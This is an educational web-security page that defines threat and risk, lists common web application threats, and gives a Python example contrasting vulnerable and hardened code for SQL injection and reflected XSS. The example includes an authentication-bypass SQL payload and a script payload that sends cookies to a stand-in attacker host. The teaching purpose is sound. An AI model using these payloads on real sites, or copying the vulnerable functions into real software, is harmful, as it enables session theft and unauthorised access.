Common Threats & Risks
Threat
A threat is any potential source of harm or adverse event that may exploit a vulnerability in a system or an organization's security measures. Threats can originate from malicious actors, system flaws, or operational weaknesses.
Risk
Risk is the potential for loss or harm resulting from a threat exploiting a vulnerability in a system or organization. It considers both the likelihood of the event occurring and its impact if it does.
A threat represents a possible danger, while risk measures the likelihood and impact of that threat materializing against a specific vulnerability. A threat alone does not always pose a significant risk: if no exploitable vulnerability exists, or if security controls reduce the likelihood of exploitation and limit its impact, the resulting risk may be low even though the threat remains.
Common Web Application Threats
The impact and severity of each threat depend on the web application and its security measures. Below are some prevalent threats:
Cross-Site Scripting (XSS) - Injecting malicious scripts into web pages so that they execute in other users' browsers.
SQL Injection (SQLi) - Inserting attacker-controlled text into database queries to bypass authentication, read, or manipulate data.
Cross-Site Request Forgery (CSRF) - Tricking an authenticated user's browser into performing actions the user did not intend.
Security Misconfigurations - Weak default settings, unnecessary features left enabled, or improperly configured security controls.
Sensitive Data Exposure - Missing or weak encryption, or careless handling and logging of confidential information.
Brute-Force and Credential Stuffing Attacks - Repeated login attempts using guessed passwords or credentials stolen from other breaches.
File Upload Vulnerabilities - Accepting malicious files without validation, leading to code execution or data leaks.
Denial-of-Service (DoS) or Distributed DoS (DDoS) - Overloading a system, from one source or many, to make it unavailable to legitimate users.
Server-Side Request Forgery (SSRF) - Abusing a server-side feature that fetches URLs to make requests to internal systems the attacker cannot reach directly.
Inadequate Access Controls - Weak authentication, session management, or authorization mechanisms.
Using Components with Known Vulnerabilities - Running outdated libraries, frameworks, or plugins with published security flaws.
Broken Access Control - Failure to enforce user permissions on the server side, allowing users to act outside their intended privileges (for example, reading another user's record by changing an identifier in a request).
This is not an exhaustive list. Other threats exist, and new vulnerabilities continue to emerge. Effective security practices help mitigate these risks.
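To make two of the listed threats concrete, the following added example (not code from the original page) shows a SQL injection and a reflected XSS, each as a vulnerable function beside its hardened form. It uses only the Python standard library; the users table, the login and greeting functions, and the attacker payloads are constructed for this demonstration and do not come from any real application.

```python
"""Added example: SQL injection and reflected XSS, vulnerable vs. hardened.

The in-memory users table and the two payloads below are constructed for
this demonstration only.
"""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a constructed in-memory users table with two sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """SQLi: attacker text is pasted straight into the query and parsed as SQL."""
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(query)]


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """Fix: bind the values as parameters so they can never change query structure."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


def greet_vulnerable(name: str) -> str:
    """Reflected XSS: untrusted input is placed into HTML without encoding."""
    return f"<p>Hello, {name}!</p>"


def greet_hardened(name: str) -> str:
    """Fix: HTML-encode the input so the browser treats it as text, not markup."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


# Constructed attacker inputs.
# The SQLi payload turns the WHERE clause into "... AND password = '' OR '1'='1'",
# which is true for every row, so the vulnerable login returns all users.
SQLI_PAYLOAD = "' OR '1'='1"
# The XSS payload would run in the victim's browser if reflected unescaped.
XSS_PAYLOAD = "<script>document.location='https://evil.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, "alice", SQLI_PAYLOAD))  # ['alice', 'bob']
    print("hardened login:  ", login_hardened(db, "alice", SQLI_PAYLOAD))    # []
    print("vulnerable page: ", greet_vulnerable(XSS_PAYLOAD))
    print("hardened page:   ", greet_hardened(XSS_PAYLOAD))
```

The same two defences generalize: any time untrusted input crosses into an interpreter (SQL, HTML, a shell, LDAP) it must be bound as data or encoded for that interpreter's grammar, never concatenated into its syntax.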